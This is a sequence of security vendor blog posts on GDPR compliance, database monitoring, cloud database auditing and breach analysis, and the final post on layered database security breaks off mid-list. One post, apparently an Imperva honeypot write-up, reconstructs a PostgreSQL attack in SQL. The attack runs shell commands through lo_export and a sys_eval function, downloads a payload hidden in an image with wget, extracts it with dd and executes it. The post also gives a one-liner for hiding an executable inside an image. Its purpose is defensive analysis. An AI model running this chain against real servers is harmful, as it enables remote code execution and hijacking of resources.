The GDPR requires ongoing protection and regular testing and verification of technical and organizational measures used to ensure security of processing. Continuous database vulnerability assessments identify risks to personal data. Imperva SecureSphere finds those security holes in your databases that attackers can exploit. It has a library of over 1,500 pre-defined tests and scans database servers and the OS platforms for vulnerabilities and misconfigurations such as missing patches, default passwords or misconfigured privileges. You can also generate assessment reports that provide concrete recommendations to mitigate identified vulnerabilities and strengthen the security posture of a scanned database server.

Monitoring Data Access Activity

Data activity monitoring is critical under the GDPR, as the regulation requires organizations to maintain a secure environment for data processing. To meet GDPR requirements, you need to be able to answer these questions: Who is accessing the data? And how is the data being used?

With SecureSphere you can gain complete visibility into data activity by continuously monitoring and analyzing all database activity, including local privileged user access and service accounts, in real time. Monitoring and auditing database activity helps ensure that personal data is being used appropriately and accessed only by authorized users. With data monitoring you can also prevent data theft from external attacks like SQL injection and protect against insider threats − malicious, careless or compromised users. By keeping a watchful eye on the data, you can identify and block suspicious or unauthorized data access before it becomes a breach.
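
As a generic point of reference for those two questions, native database auditing can log who reads and writes what; the sketch below uses the open-source pgaudit extension for PostgreSQL (it assumes pgaudit is already listed in shared_preload_libraries, and it is not how SecureSphere itself is configured):

  -- Enable session-level audit logging of reads, writes and DDL
  CREATE EXTENSION IF NOT EXISTS pgaudit;
  ALTER SYSTEM SET pgaudit.log = 'read, write, ddl';
  SELECT pg_reload_conf();  -- apply the setting without a restart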

Breach Detection and Incident Response

In the event of a personal data breach, the GDPR dictates that data controllers must notify the supervisory authority “without undue delay and, where feasible, not later than 72 hours after having become aware of it.” If notification is not made within 72 hours, the controller must provide a reasoned justification for the delay.

The biggest challenge is that security teams are overwhelmed with large volumes of incident alerts and that truly worrisome incidents get lost in the noise. Imperva CounterBreach leverages advanced machine learning and peer group analysis to prioritize data access incidents that require immediate attention – without security teams needing deep knowledge of the data environment. It analyzes user behavior and data access activities to identify truly worrisome (or dangerous) incidents, reducing the window of exposure.

Enforcing Cross-Border Data Transfer Policies

The GDPR imposes restrictions on the transfer of personal data outside the European Economic Area (EEA) to ensure that data protection and privacy requirements outlined in the regulation are not undermined. Article 44 of the GDPR prohibits the transfer of personal data beyond the EEA, unless the recipient country can prove adequate data protection.

SecureSphere helps you enforce requirements outlined in model contracts and binding corporate rules (BCRs). Ongoing database discovery and classification scans ensure new databases and personal data are cataloged and protected. Policies can be created to inspect the database traffic. When policy violations occur, such as unauthorized access, blocking user connections or terminating a transaction can help ensure appropriate cross-border data access and use.

Contact us to learn more about Imperva’s GDPR compliance capabilities and explore our data security solutions in detail.

Three Pitfalls to Avoid on Your Data Security Journey

The European Union’s General Data Protection Regulation (GDPR) has shifted attention to the security and privacy of customer data. But more importantly, the regulation calls for enterprises to assess existing data security policies, processes and enforcement mechanisms — a practice that in my experience generally gets completed moments before an audit.

Data Security Takes the Lead

Compliance continues to be a main driver of data protection technologies such as encryption, tokenization, data loss prevention, and file access monitoring and alerting. Roughly half of the enterprise inquiries IDC receives about data security technologies, strategy and best practices result from a failed audit, a significant security incident or a data breach.

While many of these discussions seek to identify and examine subtle security solution differentiators, one common element is clear: The failed audit, security incident or data breach stemmed from a policy flub or process breakdown that resulted from a change to the environment — a new or altered business initiative or newly installed productivity software — that wasn’t fully vetted. It’s usually the “people” part of the people, process and technology equation that creates a cascading breakdown.

GDPR, which takes effect in May, isn’t very prescriptive. Its recommendations largely point to the need for a comprehensive data security strategy. The only technology recommendation specifically called out in the document is encryption.

The language of the regulation will be discussed and debated by legal teams until the first fines are levied and the measure’s true teeth are tested in court. The essential point is that meeting the spirit of the regulation requires a careful assessment of the existing state of an organization’s data security program, a possible refresh of data governance policies, a reconfiguring of existing security controls and potential process changes.

The Three Pitfalls

Undertaking such an exercise is no easy feat, and it must involve all stakeholders to avoid any possible missteps. I’ve noted the following pitfalls from discussions with auditors, enterprise chief information security officers (CISOs) and other security practitioners over the years.

1. Failure to Conduct a Comprehensive Assessment

Organizations must know where the most critical data resides. Understanding this requires both discovery tools and an actual discussion with data owners, business partners and other stakeholders. Organizations are creating and using data at an unprecedented level, and over the last several years, data has become richer and more unstructured.

IDC’s Digital Universe Study found that in 2017 the amount of data created, captured and replicated exceeded 10 zettabytes. The good news is that much of this data doesn’t need encryption and is rarely stored. But some of it requires attention. The question to ask data owners is: If exposed or lost, what data would be catastrophic to the business?

2. Failure to Adequately Deploy Security Controls

Organizations deploy encryption, implement data and file activity monitoring, and ensure adequate compliance automation and auditing, but they often fail to address the weakest and most likely pathway of an attack. A security incident generally takes place because an insider or external attacker bypasses these safeguards.

Such incidents may stem from enterprises historically investing in siloed security products. Security controls can’t be comprehensive unless they integrate with identity and access management (IAM) systems, endpoint security software, network security appliances, security information and event management (SIEM) platforms and other IT security tools.

3. Failure to Keep Pace With Change

Even organizations that properly implemented data protection have been victims of breaches. A review of insurance claims associated with data breaches found that some organizations fail to keep track of altered network infrastructure — alterations often due to shifts in business strategy. Key assets that need to be protected are sometimes forgotten.

Mistakes happen, too. Technology rarely solves the problem of human fallibility. For example, a security consultancy conducting a risk assessment at a healthcare organization found that even though financial files were stored on an encrypted server, the team deploying the server on the network assigned it to the guest Wi-Fi.

More Than One Bottom Line

GDPR measures shed light on how digital business transformation strategies at enterprises are impacting society. Sharp, competitive organizations are continuously analyzing customer data to provide new and improved services. The insight gleaned from this analysis attempts to identify and adapt to potentially disruptive changes and, in turn, create new business models, products and services that enhance the customer experience.

While the effective use of data results in improving operational efficiencies and organizational performance, IT teams need to consider the impact to their risk mitigation strategies. Consider the data that’s the lifeblood of your organization and allocate resources based on risk rather than simply addressing a compliance checklist.

Listen to the podcast: Avoiding Common Data Security Mistakes

Notice: Clients are responsible for ensuring their own compliance with various laws and regulations, including GDPR. IBM does not provide legal advice and does not represent or warrant that its services or products will ensure that clients are in compliance with any law or regulation. Learn more about IBM’s own GDPR readiness journey and our GDPR capabilities and offerings to support your compliance journey here.

The post Three Pitfalls to Avoid on Your Data Security Journey appeared first on Security Intelligence.

A Deep Dive into Database Attacks [Part III]: Why Scarlett Johansson’s Picture Got My Postgres Database to Start Mining Monero

As part of Imperva’s efforts to protect our customers’ data, we have an ongoing research project focused on analyzing and sharing different attack methods on databases. If you aren’t familiar with this project, which we call StickyDB, please read Part I and Part II. There we explain this database honeypot net (Figure 1), which tricks attackers into targeting our databases so we can all learn from it and get more secure.

We just saw an interesting attack technique applied to one of our PostgreSQL servers. After logging into the database, the attacker continued to create different payloads, implement evasion techniques through embedded binaries in a downloaded image, extract payloads to disk and trigger remote code execution of these payloads. Like so many attacks we’ve witnessed lately, it ended up with the attacker utilizing the server’s resources for cryptomining Monero. As if this wasn’t enough, the attack vector was a picture of Scarlett Johansson. Alright then. Let’s take a deep dive into the attack!


Figure 1: The StickyDB honeypot net environment

Establishing Remote Code Execution and Evading DAM Solutions

PostgreSQL, like other common databases, has a Metasploit module that eases interaction with the operating system. The method used in this attack is very similar: creating a payload at runtime by dumping binary code to disk with the lo_export function. One slight change was made relative to that module: the attacker inserted the lo_export function as an entry in the pg_proc catalog instead of making a direct call. This is done in order to evade database activity monitoring (DAM) solutions that closely watch for privileged operations like lo_export. So calling obj6440002537 is basically an indirect call to lo_export (Figure 2).

Figure 2: Evasion technique of indirect call to lo_export

“OK, I took control of your database. Now which GPU do you have?”

Now the attacker is able to execute local system commands using one simple function – fun6440002537. This SQL function is a wrapper for calling a C-language function, “sys_eval”, a small exported function in “tmp406001440” (a binary based on sqlmapproject), which basically acts as a proxy for invoking shell commands from the SQL client.
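
For readers who want the shape of this in SQL, here is a hedged reconstruction of the underlying large-object technique (the hex bytes, the large-object OID and the file paths are placeholders, and in the actual attack lo_export was invoked indirectly through the pg_proc alias rather than directly as shown):

  -- Write attacker-supplied bytes into a large object (payload truncated to the ELF magic here)
  SELECT lo_from_bytea(0, decode('7f454c46', 'hex'));
  -- Dump the large object to disk; 16385 stands in for the OID returned above
  SELECT lo_export(16385, '/tmp/tmp406001440');
  -- Map the binary's exported C symbol into SQL...
  CREATE OR REPLACE FUNCTION fun6440002537(text) RETURNS text
      AS '/tmp/tmp406001440', 'sys_eval' LANGUAGE C STRICT;
  -- ...and shell commands now run as the database OS user
  SELECT fun6440002537('id');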

So what were the next steps of the attack? Some reconnaissance. It started with getting the details of the GPU by executing lshw -c video, and continued with cat /proc/cpuinfo to get the CPU details (Figures 3-4). While this feels odd at first, it makes complete sense when your end goal is to mine as much as possible of your favorite cryptocurrency, right?

Figure 3: Checking the GPU details

Figure 4: Checking the CPU details

Up until now, the attacker has gained access to the database, established a way to execute code remotely while evading DAM solutions, and learned about the system details. Now everything is set up to… download a picture of Scarlett Johansson?! Wait, what?

A malware payload masquerading as Scarlett Johansson’s picture

Attackers are getting more and more creative, I must say.

In this case the attackers wanted to download their latest piece of malicious code, so they hosted it as an image on imagehousing.com, a legit place to host and share your images freely. However, the payload is in binary format, not an image. Simply renaming a binary to have an image extension will most likely fail during upload to the image-hosting provider, for the very simple reason that it is not a valid, nor viewable, picture – so no preview and no picture. Instead of renaming the file extension, the attacker appended the malicious binary code to a real picture of the lovely Scarlett Johansson (Figure 5). This way the upload succeeds, the picture is viewable, appears benign and the payload is still there.

Figure 5: The payload. When opened, it appears to be a benign picture. No worries – the picture in this blog is clean, that’s for sure!

Do you see the binary code? It’s right below her left elbow! 🙂

We contacted imagehousing.com about the issue and the image has been deleted.

From downloading a picture to cryptomining Monero

Downloading the image (art-981754.png) with the payload was easily done with wget. Extracting the executable out of this image was done with the dd (data duplicator) command, and execution permissions – actually full permissions (chmod 777) – were set on the newly created file, x4060014400. The last step was to run this newly extracted payload, all in SQL, as follows –

Figure 6: How to use SQL to download a picture, extract binary payload out of it and execute it
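
Since the figure itself isn’t reproduced in text here, the chain looked roughly like the following hedged reconstruction (the download URL and the dd offset are illustrative; in the real attack the offset matched the size of the clean picture, so that only the appended payload was copied out):

  -- Fetch the image, carve out the appended binary, make it executable, and run it
  SELECT fun6440002537('wget -q https://imagehousing.com/art-981754.png -O /tmp/art-981754.png');
  SELECT fun6440002537('dd if=/tmp/art-981754.png of=/tmp/x4060014400 bs=1 skip=360000');
  SELECT fun6440002537('chmod 777 /tmp/x4060014400');
  SELECT fun6440002537('/tmp/x4060014400');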

The x4060014400 file creates another executable, named s4060014400. This executable’s goal is to mine Monero (XMR) for the Monero pool at https://monero.crypto-pool.fr/, IP 163.172.226.218 (Figure 7). This attack’s Monero address has received more than 312.5 XMR so far, valued at more than $90,000 to date. The address is:

4BBgotjSkvBjgx8SG6hmmhEP3RoeHNei9MZ2iqWHWs8WEFvwUVi6KEpLWdfNx6Guiq5451Fv2SoxoD7rHzQhQTVbDtfL8xS

Figure 7: SQL statement to start mining Monero

And of course, when done, cleanup takes place –

Figure 8: Cleaning up file traces

From the attacker’s standpoint: Mission accomplished!

Do antiviruses identify these malicious pictures?

Using Google’s VirusTotal, we checked the detection rate of almost 60 antiviruses with three different forms of the cryptominer in this attack – the URL that hosted the malicious image, just the malicious image and just the cryptominer. The results are:

  • The URL that hosted the malicious image: one antivirus flagged it as malware (Figure 9)
  • The malicious image: three antiviruses flagged it as a coinminer (Figure 10)
  • The cryptominer extracted from the malicious image: 18 antiviruses detected it (Figure 11)

Figure 9: One antivirus detected the malicious URL

Figure 10: Three antiviruses detected the malicious picture

Figure 11: Eighteen antiviruses detected the cryptominer

Using this trick of appending binary code to legit files (images, documents) to create a mutated file is a really old-school method, but it still bypasses most antiviruses, which is shocking.

And creating such a mutated file is as simple as this one-liner:

Linux: cat myExecutableFile >> myImageFile.png

Windows: type myExecutableFile.exe >> myImageFile.png

How can an attacker find PostgreSQL databases?

An attempt to discover PostgreSQL instances within a domain can be made using discovery tools such as Nmap, assuming the attacker is already inside the local network. But can attackers find easier targets? What about publicly exposed PostgreSQL databases? We know it is bad practice, but are there any such databases out there? Well, yes – at least 710,000 of them, a large share hosted on AWS (Figure 12). And finding them is as easy as a Google search, using online services like Shodan. So an attacker can easily find them, try to brute-force the default postgres user to get in, and then apply some of the techniques we described.

Figure 12: 710K PostgreSQL instances with public IP address. Credit: shodan.io

We’ll discuss more attacks in the next article in this series. The last article will be all about attack mitigations, but here are a few quick tips to help you avoid getting hit by this attack:

  • Watch out for direct calls to lo_export, or indirect calls through entries in pg_proc (see the detection sketch after this list)
  • Beware of functions calling C-language binaries (as in Figure 2)
  • Use a firewall to block outgoing network traffic from your database to the internet
  • Make sure your database is not assigned a public IP address. If it is, restrict access to only the hosts that interact with it (the application server or clients owned by DBAs)
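
As a starting point for the first two tips, the catalog queries below flag pg_proc entries that alias lo_export, as well as user-defined C-language functions backed by binaries outside the standard library directory (a sketch only; the internal name recorded in prosrc for lo_export varies across PostgreSQL versions, hence the two spellings):

  -- Aliases of lo_export hiding under another name
  SELECT proname FROM pg_proc
  WHERE prosrc IN ('lo_export', 'be_lo_export') AND proname <> 'lo_export';

  -- C-language functions whose backing binary lives outside $libdir
  SELECT p.proname, p.probin
  FROM pg_proc p
  JOIN pg_language l ON l.oid = p.prolang
  WHERE l.lanname = 'c' AND p.probin NOT LIKE '$libdir%';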

RDaaS Security: How to Apply Database Audit and Monitoring Controls

As you move databases to cloud database platforms, data security and compliance requirements move along with them. This article explains how you can apply database audit and monitoring controls when migrating your database to cloud services, including the following:

  • Introduction to RDaaS
  • Benefits of RDaaS Adoption
  • Who is responsible for DB security in the cloud?
  • Taking steps to ensure relational database security in the cloud

Introduction to RDaaS

Relational Database as a Service (RDaaS) provides the equipment, software and infrastructure businesses need to run their databases in the cloud, rather than putting something together in-house. Examples of RDaaS offerings include Amazon Relational Database Service (RDS) and Microsoft Azure SQL Database.

Benefits of RDaaS adoption

The advantages of RDaaS adoption can be fairly substantial. Here are just a few of the benefits:

  • Allows you to reserve capital rather than spending it on equipment or software licenses
  • Reduces expenses related to hiring highly skilled staff and/or consultants
  • Eliminates the pain points associated with building a database system
  • Requires no additional IT staff to maintain the database system
  • Utility fees required to operate an RDaaS are the responsibility of the cloud provider
  • Resiliency and dependability are guaranteed by the cloud provider
  • Cloud provider database teams are experienced and know how to handle a variety of bugs and problems
  • The RDaaS provider is often housed at a hardened site, and is therefore less vulnerable to natural disasters, power loss and other disruptions that could otherwise affect your daily operations.
  • The RDaaS provider is competitively focused on providing the best possible service, and can devote substantial resources to optimizing equipment and recruiting qualified personnel.

Who is responsible for cloud-based DB security?

From a high-altitude viewpoint, cloud security is based on a model of “shared responsibility” in which the concern for security maps to the degree of control any given actor has over the architecture stack.

Amazon states that AWS has “responsibility for security of the cloud,” while customers have “responsibility for security in the cloud.” What does that mean for you?

Cloud vendors provide the tools and services to secure the infrastructure (such as networking and compute machines), while you are responsible for things like network traffic protection and application security. For example, cloud vendors help to restrict access to the compute instances on which the web server is deployed (by using security groups/firewalls and other methods); they also deny web traffic from accessing restricted ports by setting only the needed HTTP or HTTPS listeners in the public endpoints (usually the load balancer).

But public cloud vendors do not provide the necessary tools to fully protect against application attacks such as the OWASP Top 10 risks, automated attacks or database vulnerabilities. The responsibility falls to you to establish security measures that allow only authorized web traffic to enter your cloud-based data center — just as with a physical data center. In a physical data center, securing your data is typically done by deploying database activity monitoring against the database; fortunately, similar measures can be deployed in the public cloud as well.

How Imperva SecureSphere ensures database compliance and security in the cloud

The benefit of a solution such as SecureSphere Database Activity Monitoring (DAM) is that it integrates oversight of Amazon RDS into a broad view across all enterprise databases. With SecureSphere, here are some things you can do to ensure the security of your data in the cloud:

Monitor Databases in Cloud Services

Use the same scalable architecture proven to cost-effectively monitor thousands of on-premises databases for your databases in AWS. Non-intrusive virtual appliances, deployed individually or in HA pairs, monitor network traffic and incorporate Amazon RDS audit data into a holistic, enterprise-wide compliance dashboard.

Unify security policy

Deploy a common security and compliance policy for consistent security across on-premises and cloud databases. Secure and audit databases in the cloud and on-premises via one lens. Protect data in AWS with alerts and then block unauthorized activity.

Extend compliance to cloud databases

Demonstrate compliance with data protection and privacy regulations for databases in AWS. Provide unified audit reports across data in the cloud and on-premises. Get detailed reports for regulations such as SOX, PCI DSS and more.

Vulnerability Assessment—Detect Exposed Databases

SecureSphere Discovery and Assessment streamlines vulnerability assessment at the data layer. It provides a comprehensive list of over 1,500 tests and assessment policies for scanning platform, software and configuration vulnerabilities. Database assessments leverage the Common Vulnerability Scoring System (CVSS) and the latest research from the Imperva Defense Center to assess database servers and assign a vulnerability severity level. Assessment scans can be run on demand or at scheduled intervals, giving security teams the flexibility to scan when it least impacts IT operations. Assessment policies are available for a broad range of databases including Oracle, Microsoft SQL Server, IBM DB2 and more. The vulnerability assessment process, which can be fully customized, uses industry best practices such as DISA STIG and CIS benchmarks.

Database Auditing and Protection—The Next Step for Data Security

For complete visibility and control of user access to sensitive data, SecureSphere Discovery and Assessment can be extended to include database activity monitoring. Organizations can then implement security policies to block or alert on attempts to exploit a vulnerability, providing virtual patch protection while software patches are developed by software vendors.

Conclusion

The need for quick, panoramic visibility into the entire delivered application and data infrastructure, no matter where it is located, is paramount. Quick, coordinated control and mitigation are essential to bring the balance of defense back into the defender’s court.

Learn more about how Imperva solutions can help you ensure the safety of your database and enterprise-wide data.

2018 Cyberthreat Defense Report: Where IT Security Is Going

What keeps you awake at night? We asked IT security professionals the same question and found that these issues are top of mind: malware and spear phishing, securing mobile devices, employee security awareness and new technologies that detect threats capable of bypassing traditional signature-based defenses.

In previous years, cyberattacks were on a steady and alarming rise. But now, data shows a year-over-year decrease in organizations being hit by at least one successful attack – down from 79.2 percent to 77.2 percent.

Yet there are still plenty of obstacles and challenges security teams need to overcome. A lack of skilled IT personnel is at the top of the list. So too is low security awareness among employees and the escalating crush of data.

But the security landscape is changing as cloud deployment and delivery make significant inroads in cybersecurity. For example, deployment rates for the following security solutions in hybrid-cloud environments are:

  • 46% in DoS and DDoS prevention
  • 47% in privileged account or access management
  • 44% in security information and event management
  • 45% in web application firewall

The top three motivations for organizations investing in user and entity behavior analytics (UEBA) technology are the ability to detect account hijacking, to detect privileged access abuse and to defend against insider threats.

Enterprise security teams are beginning to realize that what they’ve done in the past is steadily losing ground to advancements by today’s threat actors. A renewed effort and investment is needed to move forward with an integrated security solution.

Despite security deployments such as WAFs, database firewalls and data encryption, online organizations still need help keeping their data safe.

Mostly they’re looking to improve threat blocking (58 percent) and threat detection (51 percent). Other popular options include reducing unwanted traffic and improving enforcement of usage policies.

A Complete Solution

IT security continues to evolve as data and application breaches grow. For security teams, getting in front of threats is key. Early detection, traffic analysis, forensics and customizable policies can make the difference in moving an organization’s security posture from reactive to proactive.

For more information, download the full 2018 Cyberthreat Defense Report at www.imperva.com/go/cdr.

Securing Healthcare Data and Applications

The healthcare industry is quickly becoming a sweet spot for hackers looking to steal large amounts of patient records for profit. The US Department of Health and Human Services breach tool reports over 340 data breaches in 2017 impacting more than 3 million individuals, and 176.5 million individuals impacted since the federal tally commenced in 2009. While there was no single large breach last year on the scale of the 78.8 million-record Anthem Blue Cross breach, the number of breaches continues to increase. Hospitals are known to be a soft target, making it easy for hackers to gather large amounts of patient data in a single hacking effort.

As cyberattacks and Internet threats continue to rise with the use of web-based healthcare portals and remote patient mobile technology, managing security and compliance across a distributed healthcare organization becomes a daunting task. A typical healthcare patient record includes name, address, social security number, birthdate and health history. With such a wealth of personal data, a bad actor can open credit accounts or apply for medical care. And while a person’s financial identity can be fully restored, healthcare data breaches have a much more personal and longer-lasting impact on victims.

In the end, the attacker’s ability to monetize is predicated upon either disrupting operations or stealing data. A data and application security solution provides the tools to protect your site and specifically to protect the privacy of patient records. These solutions protect the healthcare site from hackers who attempt to breach or disrupt the site and also provide protection to safeguard patient data.

Safeguard Patient Data

HIPAA and PCI regulations require that you protect patient health and financial data from unauthorized access and breaches. These Imperva Data Security solutions help you safeguard your sensitive data at the source, across a broad range of data stores, even if an unauthorized individual gains access to your environment.

  • Discover sensitive data – To ensure that all sensitive data is protected, Imperva SecureSphere automates data discovery. It will scan the network to identify database services and servers and identify database instances that contain sensitive data.

Databases are scanned for vulnerabilities and misconfigurations, and vulnerabilities are prioritized with remediation steps identified.

  • Monitor data usage activity – Imperva monitors and audits all data access activity, including privileged users and applications. Continuous monitoring detects and alerts you to unauthorized access, gives you details to take action, and allows you to instantly block access. SecureSphere also documents all incident findings and provides detailed reports for any audit purpose.
  • Identify risky users – Imperva CounterBreach employs machine learning to automatically uncover unusual data activity. It profiles both user and data activity to establish a baseline. Activity that deviates from that baseline can then be identified before threats become breaches.

The riskiest users and assets are identified so that the most serious incidents are prioritized. You can then filter by priority and focus resources on those incidents.

  • Mask sensitive data – Sensitive data should not be exposed to those without a need to know. To reduce the risk of data breach and comply with data protection and privacy regulations, such as HIPAA and GDPR, Imperva Camouflage Data Masking provides a variety of techniques to mask data in non-production environments. First it automatically identifies and classifies sensitive data in your database. You can then use one of the pre-defined masking techniques, or create custom data transformers, to replace that sensitive data with realistic fictional values, maintaining data utility without exposing sensitive information such as electronic health records (EHR) or electronic medical records (EMR).

Web Application Security

Imperva Web Application Firewall (WAF), named by Gartner as a leading WAF for four consecutive years, analyzes all user access to your web application and protects patient portals and health information exchanges (HIE) from cyberattacks. It protects against all web application attacks including OWASP top 10 threats and blocks malicious bots. It controls which visitors can access your application with traffic filtering based on a variety of factors.

DDoS Protection

DDoS protection automatically detects and mitigates attacks targeting websites and web applications. Imperva Incapsula is the only service to offer an SLA-backed guarantee to detect and block attacks in under 10 seconds. Our new Behemoth 2 platform blocked a 650 Gbps (Gigabit per second) DDoS flood with more than 150 Mpps (million packets per second), with capacity to spare. Besides handling large volumetric attacks, DDoS Protection specializes in mitigating complex application layer attacks.

Regulation Compliance

In addition to securing patient data, these tools enable compliance with industry data protection and privacy regulations, such as HIPAA and PCI. Compliance can be a challenge for healthcare organizations, which must meet requirements spread across a number of regulations and mandates.

Imperva solutions provide continuous, automated compliance with site and data protection, plus advanced audit and reporting tools. Please refer to the Healthcare Cyber Security Compliance Guide to find out more about how Imperva can help you comply with database, file and web application security requirements.

Hyperbole in Breach Reporting

While reading the news this morning about yet another successful data breach, I couldn't help but wonder if the hyperbole used in reporting about data breaches is stifling our ability to educate key stakeholders on what they really need to know.

Today's example is about a firm that many rely on for security strategy, planning, and execution. The article I read stated that they were "targeted by a sophisticated hack" but later explains that the attacker compromised a privileged account that provided unrestricted "access to all areas". And, according to sources, the account only required a basic password with no two-step or multi-factor authentication. That doesn't sound too sophisticated, does it? Maybe they brute-forced it, or maybe they just guessed the password (or found it written down in an office?).

It reminded me of an attack on a security vendor back in 2011. As I recall, there was a lot of talk of the sophistication and complexity of the attack. It was called an Advanced Persistent Threat (and maybe some aspects of it were advanced). But, when the facts came out, an employee simply opened an email attachment that introduced malware into the environment - again, not overly sophisticated in terms of what we think a hack to be.

The quantity, availability, and effectiveness of attack techniques are enough to make anyone uncomfortable with their security posture. I previously wrote about a German company who, in a breach response, wrote that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." CISOs are being told that they should expect to be breached. The only questions are about when and how to respond. It makes you feel like there's no hope; like there's no point in trying.

However, if you look at the two examples above that were described as highly sophisticated, they may have been avoided with simple techniques such as employee education, malware detection, and multi-factor authentication. I don't mean to over-simplify. I'm not saying it's all easy or that these companies are at-fault or negligent. I'm just calling for less hyperbole in the reporting. Call out the techniques that help companies avoid similar attacks. Don't describe an attack as overly sophisticated if it's not. It makes people feel even more helpless when, perhaps, there are some simple steps that can be taken to reduce the attack surface.

I'd also advocate for more transparency from those who are attacked. Companies shouldn't feel like they have to make things sound more complicated or sophisticated than they are. There's now a growing history of reputable companies (including in the security industry) who have been breached. If you're breached, you're in good company. Let's talk in simple terms about the attacks that happen in the real world. An "open kimono" approach will be more effective at educating others in prevention. And again, less hyperbole - we don't need to overplay to emotion here. Everyone is scared enough. We know the harsh reality of what we (as security professionals) are facing. So, let's strive to better understand the real attack surface and how to prioritize our efforts to reduce the likelihood of a breach.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.
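
To make the distinction concrete, here is a minimal sketch of reversible at-rest column encryption, shown in SQL with the pgcrypto extension for brevity (the customers table, the ssn_enc bytea column and the key are all hypothetical, and the post describes this pattern implemented in application code rather than in the database). It illustrates the point above: any caller holding the key, including a compromised application, reads the plaintext just fine:

  CREATE EXTENSION IF NOT EXISTS pgcrypto;
  -- Encrypt the sensitive column with a key the application holds
  UPDATE customers SET ssn_enc = pgp_sym_encrypt(ssn, 'app-held-secret');
  -- Anything with the key (e.g., the compromised app) decrypts on demand
  SELECT pgp_sym_decrypt(ssn_enc, 'app-held-secret') AS ssn FROM customers;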

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on to say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
